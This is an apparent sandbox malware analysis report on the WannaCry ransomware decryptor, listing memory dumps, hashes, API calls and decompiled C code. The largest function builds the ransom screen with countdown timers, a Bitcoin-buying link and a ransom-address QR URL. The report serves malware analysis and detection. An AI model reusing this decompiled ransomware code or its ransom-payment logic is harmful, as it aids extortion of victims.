                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #823
                                  • String ID:
                                  • API String ID: 3944439427-0
                                  • Opcode ID: 978e7c28ec40dcb92e7f5f015123019c4ac679a5b0e7e4509185db9b43198a7e
                                  • Instruction ID: 181cdc8cf12c05a8b9a91361c5a521ffeb8e85c4f1c0f104596c53608345ae24
                                  • Opcode Fuzzy Hash: 978e7c28ec40dcb92e7f5f015123019c4ac679a5b0e7e4509185db9b43198a7e
                                  • Instruction Fuzzy Hash: FBD017B02022018EDB48DB048155A2ABA906F90305F04C03EA58A8B3A1DA308924D719
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DB60 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • send.WS2_32(?,?,?,00000000), ref: 0040DB71
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: send
                                  • String ID:
                                  • API String ID: 2809346765-0
                                  • Opcode ID: 3222a83dba255473e0a20e544844f5fa8dd218e70a3b82de0a2cb3badf245f05
                                  • Instruction ID: 9f2cde9bc08329bc066051ceec9112dcc508ea1adec728888a2f9463dd607dc2
                                  • Opcode Fuzzy Hash: 3222a83dba255473e0a20e544844f5fa8dd218e70a3b82de0a2cb3badf245f05
                                  • Instruction Fuzzy Hash: D9C04C79204300FFD204CB10CD85F6BB7A9EBD4710F50C90DB98983254C670EC10DA65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004102B0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004102B0(int _a8, int _a12) {
				void* _t4;

				_t4 = calloc(_a8, _a12); // executed
				return _t4;
			}




                                  0x004102ba
                                  0x004102c2

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: calloc
                                  • String ID:
                                  • API String ID: 2635317215-0
                                  • Opcode ID: b99520603795e14427fcdc66bd24236fedacc387ffcb15b9e196dfa964343d57
                                  • Instruction ID: 04342e400c51e4aa9d9f1a4926e37004e53e6e9aa7dbc080471d4116a51af395
                                  • Opcode Fuzzy Hash: b99520603795e14427fcdc66bd24236fedacc387ffcb15b9e196dfa964343d57
                                  • Instruction Fuzzy Hash: 3FB012B95042007FC904FB51DC41C6BB398FBD4201F80884DBC4D42200D539D944C632
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004102D0 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004102D0(void* _a8) {
				void* _t2;

				_t2 = _a8;
				free(_t2); // executed
				return _t2;
			}




                                  0x004102d0
                                  0x004102d5
                                  0x004102db

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: free
                                  • String ID:
                                  • API String ID: 1294909896-0
                                  • Opcode ID: 9547fd8474c1228e0edb2c3a8820201b614da8fcf41e046977b995a71f98eb8e
                                  • Instruction ID: 587bd5a705c9874b05802bcdcd007e1f5146f32a08b66df6e73241f9cdea139c
                                  • Opcode Fuzzy Hash: 9547fd8474c1228e0edb2c3a8820201b614da8fcf41e046977b995a71f98eb8e
                                  • Instruction Fuzzy Hash: 22A022B2000200328C00BAA0C00288A2B8C2A80202B20088EB00282020CA38C0C00200
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00406F80 Relevance: 130.0, APIs: 67, Strings: 7, Instructions: 536windowtimeCOMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E00406F80(void* __ecx, void* __fp0) {
				struct HFONT__* _t135;
				long _t137;
				long _t138;
				long _t139;
				long _t141;
				long _t142;
				long _t143;
				long _t145;
				long _t146;
				long _t147;
				long _t149;
				void* _t214;
				int _t216;
				int _t235;
				int _t238;
				int _t240;
				int _t242;
				int _t245;
				int _t248;
				int _t251;
				int _t253;
				void* _t260;
				void* _t262;
				int _t339;
				void* _t348;
				int _t352;
				intOrPtr _t355;
				intOrPtr _t356;
				intOrPtr _t357;
				intOrPtr _t358;
				void* _t359;
				void* _t360;
				void* _t361;
				void* _t375;

				_t375 = __fp0;
				_push(0xffffffff);
				_push(E00413E9B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t355;
				_t356 = _t355 - 0xd4;
				_t348 = __ecx;
				_push(0);
				E004076A0(__ecx);
				_push(CreateSolidBrush(0xe0));
				L00412D5E();
				_push(CreateSolidBrush(0x121284));
				L00412D5E();
				_push(CreateSolidBrush(0xe000));
				L00412D5E();
				_push(CreateSolidBrush(0xe00000));
				L00412D5E();
				_push(CreateSolidBrush(0));
				L00412D5E();
				_push(CreateSolidBrush(0x3834d1));
				L00412D5E();
				_push(CreateSolidBrush(0x107c10));
				L00412D5E();
				_push(CreateSolidBrush(0xe8a200));
				L00412D5E();
				_push(CreateSolidBrush(0xd77800));
				L00412D5E();
				_push(CreateSolidBrush(0x3cda));
				L00412D5E();
				_t339 = __ecx + 0x880;
				_push(CreateFontA(0x18, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
				L00412D5E();
				_t216 = __ecx + 0x888;
				_push(CreateFontA(0x12, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
				L00412D5E();
				_t352 = __ecx + 0x890;
				_t135 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t135);
				L00412D5E();
				_push(0x3ed);
				L00412CE6();
				if(_t339 != 0) {
					_t339 =  *(_t339 + 4);
				}
				_t137 = SendMessageA( *(_t135 + 0x20), 0x30, _t339, 1);
				_push(0x3fe);
				L00412CE6();
				if(_t216 != 0) {
					_t235 =  *(_t216 + 4);
				} else {
					_t235 = 0;
				}
				_t138 = SendMessageA( *(_t137 + 0x20), 0x30, _t235, 1);
				_push(0x3fb);
				L00412CE6();
				if(_t216 != 0) {
					_t238 =  *(_t216 + 4);
				} else {
					_t238 = 0;
				}
				_t139 = SendMessageA( *(_t138 + 0x20), 0x30, _t238, 1);
				_push(0x3ff);
				L00412CE6();
				if(_t352 != 0) {
					_t240 =  *(_t352 + 4);
				} else {
					_t240 = 0;
				}
				_t141 = SendMessageA( *(_t139 + 0x20), 0x30, _t240, 1);
				_push(0x3fc);
				L00412CE6();
				if(_t352 != 0) {
					_t242 =  *(_t352 + 4);
				} else {
					_t242 = 0;
				}
				_t142 = SendMessageA( *(_t141 + 0x20), 0x30, _t242, 1);
				_push(0x400);
				L00412CE6();
				if(_t352 != 0) {
					_t245 =  *(_t352 + 4);
				} else {
					_t245 = 0;
				}
				_t143 = SendMessageA( *(_t142 + 0x20), 0x30, _t245, 1);
				_push(0x3fa);
				L00412CE6();
				if(_t352 != 0) {
					_t352 =  *(_t352 + 4);
				}
				_t145 = SendMessageA( *(_t143 + 0x20), 0x30, _t352, 1);
				_push(0x402);
				L00412CE6();
				if(_t216 != 0) {
					_t248 =  *(_t216 + 4);
				} else {
					_t248 = 0;
				}
				_t146 = SendMessageA( *(_t145 + 0x20), 0x30, _t248, 1);
				_push(0x3ef);
				L00412CE6();
				if(_t216 != 0) {
					_t251 =  *(_t216 + 4);
				} else {
					_t251 = 0;
				}
				_t147 = SendMessageA( *(_t146 + 0x20), 0x30, _t251, 1);
				_push(0x3eb);
				L00412CE6();
				if(_t216 != 0) {
					_t253 =  *(_t216 + 4);
				} else {
					_t253 = 0;
				}
				_t149 = SendMessageA( *(_t147 + 0x20), 0x30, _t253, 1);
				_push(0x3ec);
				L00412CE6();
				if(_t216 != 0) {
					_t216 =  *(_t216 + 4);
				}
				SendMessageA( *(_t149 + 0x20), 0x30, _t216, 1);
				_push(_t348 + 0x5be);
				L00412DA0();
				E00404260(_t348 + 0x228,  *(_t348 + 0x824) ^ 0x00ffffff);
				E00404260(_t348 + 0x290,  *(_t348 + 0x824) ^ 0x00ffffff);
				E00404260(_t348 + 0x2f8,  *(_t348 + 0x824) ^ 0x00ffffff);
				_t260 = _t348 + 0x360;
				E00404260(_t260,  *(_t348 + 0x824) ^ 0x00ffffff);
				_push(_t260);
				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
				L00412CAA();
				_t262 = _t348 + 0x228;
				E00404210(_t262, "https://en.wikipedia.org/wiki/Bitcoin");
				_push(_t262);
				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
				L00412CAA();
				E00404210(_t348 + 0x290, "https://www.google.com/search?q=how+to+buy+bitcoin");
				L00412DA6();
				_push(_t348 + 0x58c);
				_push("mailto:%s");
				_push(_t356 + 0x10);
				 *(_t356 + 0xf8) = 0;
				L00412E00();
				_t357 = _t356 + 8;
				 *((intOrPtr*)(_t357 + 0x18)) = _t357;
				L00412F56();
				E00404210(_t348 + 0x2f8, _t357 + 0x14);
				E00404270(_t348 + 0x888);
				_push( *((intOrPtr*)(_t348 + 0x508)));
				_push("http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s");
				_push(_t357 + 0x10);
				L00412E00();
				_t358 = _t357 + 8;
				 *((intOrPtr*)(_t358 + 0x18)) = _t358;
				L00412F56();
				E00404210(_t348 + 0x360, _t358 + 0x14);
				SendMessageA( *(_t348 + 0x140), 0x406, 0, 0x64);
				SendMessageA( *(_t348 + 0x1c4), 0x406, 0, 0x64);
				_push(0xffffffff);
				_push(2);
				L00412F50();
				_push(0xffffffff);
				_push(2);
				 *( *(_t348 + 0x164)) = 0xe0;
				( *(_t348 + 0x164))[1] = 0xe000;
				L00412F50();
				 *( *(_t348 + 0x1e8)) = 0xe0;
				( *(_t348 + 0x1e8))[1] = 0xe000;
				_t342 = _t348 + 0x3c8;
				E00405820(_t348 + 0x3c8, 1);
				E00405800(_t348 + 0x3c8, 0xb);
				E00405200(_t348 + 0x3c8, 0);
				_push( *(_t348 + 0x824));
				E00405920(_t348 + 0x3c8,  *(_t348 + 0x824), 0xffffff);
				E00405860(_t342, 0xb);
				E004058C0(_t342, 1);
				E00405990(_t342, 1, 0x20);
				E00405180(_t342, "00;00;00;00");
				_t343 = _t348 + 0x444;
				E00405820(_t348 + 0x444, 1);
				E00405800(_t348 + 0x444, 0xb);
				E00405200(_t348 + 0x444, 0);
				_push( *(_t348 + 0x824));
				E00405920(_t348 + 0x444,  *(_t348 + 0x824), 0xffffff);
				E00405860(_t343, 0xb);
				E004058C0(_t343, 1);
				E00405990(_t343, 1, 0x20);
				E00405180(_t343, "00;00;00;00");
				GetTimeZoneInformation(_t358 + 0x38);
				_push(_t358 + 0x28);
				E00401E60(_t375, ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
				_t359 = _t358 + 8;
				SystemTimeToTzSpecificLocalTime(_t359 + 0x3c, _t359 + 0x28, _t359 + 0x18);
				_push( *(_t359 + 0x24) & 0x0000ffff);
				_push( *(_t359 + 0x22) & 0x0000ffff);
				_push( *(_t359 + 0x20) & 0x0000ffff);
				_push( *(_t359 + 0x1c) & 0x0000ffff);
				_push( *(_t359 + 0x26) & 0x0000ffff);
				_push( *(_t359 + 0x26) & 0x0000ffff);
				_push("%d/%d/%d %02d:%02d:%02d");
				_push(_t348 + 0x500);
				L00412E00();
				_push(_t359 + 0x48);
				E00401E60(_t375, ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
				_t360 = _t359 + 0x28;
				SystemTimeToTzSpecificLocalTime(_t360 + 0x38, _t360 + 0x28, _t360 + 0x18);
				_push( *(_t360 + 0x24) & 0x0000ffff);
				_push( *(_t360 + 0x22) & 0x0000ffff);
				_push( *(_t360 + 0x20) & 0x0000ffff);
				_push( *(_t360 + 0x20) & 0x0000ffff);
				_push( *(_t360 + 0x26) & 0x0000ffff);
				_push( *(_t360 + 0x26) & 0x0000ffff);
				_t214 = _t348 + 0x504;
				_push("%d/%d/%d %02d:%02d:%02d");
				_push(_t214);
				L00412E00();
				_t361 = _t360 + 0x20;
				_push(0);
				L00412E06();
				 *((intOrPtr*)(_t361 + 0xec)) = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] =  *((intOrPtr*)(_t361 + 0xe4));
				return _t214;
			}





































                                  0x00406f80
                                  0x00406f86
                                  0x00406f88
                                  0x00406f8d
                                  0x00406f8e
                                  0x00406f95
                                  0x00406f9f
                                  0x00406fa1
                                  0x00406fa3
                                  0x00406fb5
                                  0x00406fbc
                                  0x00406fc8
                                  0x00406fcf
                                  0x00406fdb
                                  0x00406fe2
                                  0x00406fee
                                  0x00406ff5
                                  0x00406ffe
                                  0x00407005
                                  0x00407011
                                  0x00407018
                                  0x00407024
                                  0x0040702b
                                  0x00407037
                                  0x0040703e
                                  0x0040704a
                                  0x00407051
                                  0x0040705d
                                  0x00407064
                                  0x00407091
                                  0x00407099
                                  0x0040709c
                                  0x004070c3
                                  0x004070cb
                                  0x004070ce
                                  0x004070f5
                                  0x004070fb
                                  0x00407101
                                  0x00407104
                                  0x00407109
                                  0x00407110
                                  0x00407117
                                  0x00407119
                                  0x00407119
                                  0x0040712b
                                  0x0040712d
                                  0x00407134
                                  0x0040713b
                                  0x00407141
                                  0x0040713d
                                  0x0040713d
                                  0x0040713d
                                  0x0040714d
                                  0x0040714f
                                  0x00407156
                                  0x0040715d
                                  0x00407163
                                  0x0040715f
                                  0x0040715f
                                  0x0040715f
                                  0x0040716f
                                  0x00407171
                                  0x00407178
                                  0x0040717f
                                  0x00407185
                                  0x00407181
                                  0x00407181
                                  0x00407181
                                  0x00407191
                                  0x00407193
                                  0x0040719a
                                  0x004071a1
                                  0x004071a7
                                  0x004071a3
                                  0x004071a3
                                  0x004071a3
                                  0x004071b3
                                  0x004071b5
                                  0x004071bc
                                  0x004071c3
                                  0x004071c9
                                  0x004071c5
                                  0x004071c5
                                  0x004071c5
                                  0x004071d5
                                  0x004071d7
                                  0x004071de
                                  0x004071e5
                                  0x004071e7
                                  0x004071e7
                                  0x004071f3
                                  0x004071f5
                                  0x004071fc
                                  0x00407203
                                  0x00407209
                                  0x00407205
                                  0x00407205
                                  0x00407205
                                  0x00407215
                                  0x00407217
                                  0x0040721e
                                  0x00407225
                                  0x0040722b
                                  0x00407227
                                  0x00407227
                                  0x00407227
                                  0x00407237
                                  0x00407239
                                  0x00407240
                                  0x00407247
                                  0x0040724d
                                  0x00407249
                                  0x00407249
                                  0x00407249
                                  0x00407259
                                  0x0040725b
                                  0x00407262
                                  0x00407269
                                  0x0040726b
                                  0x0040726b
                                  0x00407277
                                  0x00407285
                                  0x00407288
                                  0x0040729f
                                  0x004072b7
                                  0x004072d0
                                  0x004072db
                                  0x004072e8
                                  0x004072ed
                                  0x004072f0
                                  0x004072f9
                                  0x004072fe
                                  0x00407304
                                  0x00407309
                                  0x0040730c
                                  0x00407315
                                  0x00407320
                                  0x00407329
                                  0x00407338
                                  0x00407339
                                  0x0040733e
                                  0x0040733f
                                  0x0040734a
                                  0x0040734f
                                  0x00407358
                                  0x0040735d
                                  0x00407364
                                  0x00407372
                                  0x0040737e
                                  0x0040737f
                                  0x00407384
                                  0x00407385
                                  0x0040738a
                                  0x00407393
                                  0x00407398
                                  0x004073a3
                                  0x004073b8
                                  0x004073ca
                                  0x004073cc
                                  0x004073ce
                                  0x004073d6
                                  0x004073e6
                                  0x004073e8
                                  0x004073ea
                                  0x004073fc
                                  0x004073ff
                                  0x0040740c
                                  0x00407418
                                  0x0040741b
                                  0x00407423
                                  0x0040742c
                                  0x00407435
                                  0x00407442
                                  0x00407449
                                  0x00407452
                                  0x0040745b
                                  0x00407466
                                  0x00407472
                                  0x00407477
                                  0x00407481
                                  0x0040748a
                                  0x00407493
                                  0x004074a0
                                  0x004074a7
                                  0x004074b0
                                  0x004074b9
                                  0x004074c4
                                  0x004074d0
                                  0x004074da
                                  0x004074f3
                                  0x00407503
                                  0x0040750e
                                  0x00407520
                                  0x00407539
                                  0x00407544
                                  0x00407549
                                  0x00407559
                                  0x00407560
                                  0x00407561
                                  0x00407568
                                  0x0040756d
                                  0x0040756e
                                  0x0040757d
                                  0x00407596
                                  0x0040759b
                                  0x004075ad
                                  0x004075c6
                                  0x004075c7
                                  0x004075d6
                                  0x004075e6
                                  0x004075ed
                                  0x004075ee
                                  0x004075ef
                                  0x004075f5
                                  0x004075fa
                                  0x004075fb
                                  0x00407600
                                  0x00407605
                                  0x00407607
                                  0x00407610
                                  0x0040761b
                                  0x0040762a
                                  0x00407638

                                  APIs
                                    • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                  • CreateSolidBrush.GDI32(000000E0), ref: 00406FB3
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00406FBC
                                  • CreateSolidBrush.GDI32(00121284), ref: 00406FC6
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00406FCF
                                  • CreateSolidBrush.GDI32(0000E000), ref: 00406FD9
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00406FE2
                                  • CreateSolidBrush.GDI32(00E00000), ref: 00406FEC
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00406FF5
                                  • CreateSolidBrush.GDI32(00000000), ref: 00406FFC
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407005
                                  • CreateSolidBrush.GDI32(003834D1), ref: 0040700F
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407018
                                  • CreateSolidBrush.GDI32(00107C10), ref: 00407022
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 0040702B
                                  • CreateSolidBrush.GDI32(00E8A200), ref: 00407035
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 0040703E
                                  • CreateSolidBrush.GDI32(00D77800), ref: 00407048
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407051
                                  • CreateSolidBrush.GDI32(00003CDA), ref: 0040705B
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407064
                                  • CreateFontA.GDI32(00000018,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00407097
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 0040709C
                                  • CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070C9
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 004070CE
                                  • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070FB
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407104
                                  • #3092.MFC42(000003ED,00000000,?,765920C0,?), ref: 00407110
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040712B
                                  • #3092.MFC42(000003FE,?,765920C0,?), ref: 00407134
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040714D
                                  • #3092.MFC42(000003FB,?,765920C0,?), ref: 00407156
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040716F
                                  • #3092.MFC42(000003FF,?,765920C0,?), ref: 00407178
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407191
                                  • #3092.MFC42(000003FC,?,765920C0,?), ref: 0040719A
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071B3
                                  • #3092.MFC42(00000400,?,765920C0,?), ref: 004071BC
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071D5
                                  • #3092.MFC42(000003FA,?,765920C0,?), ref: 004071DE
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071F3
                                  • #3092.MFC42(00000402,?,765920C0,?), ref: 004071FC
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407215
                                  • #3092.MFC42(000003EF,?,765920C0,?), ref: 0040721E
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407237
                                  • #3092.MFC42(000003EB,?,765920C0,?), ref: 00407240
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407259
                                  • #3092.MFC42(000003EC,?,765920C0,?), ref: 00407262
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407277
                                  • #860.MFC42(?,?,765920C0,?), ref: 00407288
                                  • #537.MFC42(https://en.wikipedia.org/wiki/Bitcoin,?,?,?,765920C0,?), ref: 004072F9
                                  • #537.MFC42(https://www.google.com/search?q=how+to+buy+bitcoin,?,?,?,?,765920C0,?), ref: 00407315
                                  • #540.MFC42(?,?,?,?,765920C0,?), ref: 00407329
                                  • #2818.MFC42(?,mailto:%s,?,?,?,?,?,765920C0,?), ref: 0040734A
                                  • #535.MFC42(?), ref: 0040735D
                                  • #2818.MFC42(?,http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s,00000000), ref: 00407385
                                  • #535.MFC42(?), ref: 00407398
                                    • Part of subcall function 00404210: #858.MFC42(?,?,00413788,000000FF), ref: 00404235
                                    • Part of subcall function 00404210: #800.MFC42(?,?,00413788,000000FF), ref: 00404246
                                  • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073B8
                                  • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073CA
                                  • #6140.MFC42(00000002,000000FF), ref: 004073D6
                                  • #6140.MFC42(00000002,000000FF,00000002,000000FF), ref: 004073FF
                                    • Part of subcall function 00405860: GetClientRect.USER32(?,?), ref: 0040587E
                                    • Part of subcall function 00405860: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 004058A5
                                    • Part of subcall function 004058C0: GetClientRect.USER32(?,?), ref: 004058DE
                                    • Part of subcall function 004058C0: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 00405905
                                    • Part of subcall function 00405180: _mbscmp.MSVCRT ref: 00405191
                                    • Part of subcall function 00405180: #860.MFC42(?), ref: 004051A1
                                    • Part of subcall function 00405180: RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                    • Part of subcall function 00405180: InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                  • GetTimeZoneInformation.KERNEL32(?,0000000B,00000001,0000000B,00000001,00000002,000000FF,00000002,000000FF), ref: 004074DA
                                    • Part of subcall function 00401E60: VariantTimeToSystemTime.OLEAUT32(?), ref: 00401E7B
                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 00407520
                                  • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 0040756E
                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 004075AD
                                  • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 004075FB
                                  • #6334.MFC42(00000000), ref: 00407607
                                  • #800.MFC42 ref: 0040761B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1641CreateMessageSend$#3092$BrushSolid$Time$#2818$FontRectSystem$#535#537#6140#6197#800#860ClientLocalSpecific$#540#6334#858InformationInvalidateRedrawVariantWindowZone_mbscmptime
                                  • String ID: %d/%d/%d %02d:%02d:%02d$00;00;00;00$Arial$http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s$https://en.wikipedia.org/wiki/Bitcoin$https://www.google.com/search?q=how+to+buy+bitcoin$mailto:%s
                                  • API String ID: 28786460-3869059234
                                  • Opcode ID: 566e78bac420e29277e274eb052adce88cec53491b2e7cfac5d24ca603e09d5b
                                  • Instruction ID: 980e8df72422c457d288d06354c1d21c6ecb0c69e0d4732a7e3947204bb0ebed
                                  • Opcode Fuzzy Hash: 566e78bac420e29277e274eb052adce88cec53491b2e7cfac5d24ca603e09d5b
                                  • Instruction Fuzzy Hash: DB02D3B0344705ABD624EB61CC92FBF339AAFC4B04F00452DF2566B2D1DEB8B5058B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004026B0 Relevance: 54.6, APIs: 26, Strings: 5, Instructions: 318fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			E004026B0(void* __ecx) {
				void* _t109;
				intOrPtr* _t110;
				int _t111;
				void* _t115;
				intOrPtr* _t116;
				intOrPtr* _t123;
				intOrPtr _t124;
				char _t125;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t135;
				int _t139;
				int _t145;
				int _t146;
				int _t147;
				int _t149;
				int _t154;
				intOrPtr* _t221;
				void _t225;
				intOrPtr* _t226;
				wchar_t* _t227;
				intOrPtr* _t228;
				intOrPtr* _t229;
				void* _t231;
				void* _t232;
				intOrPtr _t234;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t242;

				_push(0xffffffff);
				_push(E0041356E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t234;
				_t235 = _t234 - 0x56c;
				_t232 = __ecx;
				 *((char*)(_t235 + 0x24)) =  *((intOrPtr*)(_t235 + 3));
				 *((intOrPtr*)(_t235 + 0x20)) = E0040C8F0( *((intOrPtr*)(_t235 + 3)), 0, 0);
				 *((intOrPtr*)(_t235 + 0x24)) = 0;
				 *((char*)(_t235 + 0x10)) =  *((intOrPtr*)(_t235 + 0xb));
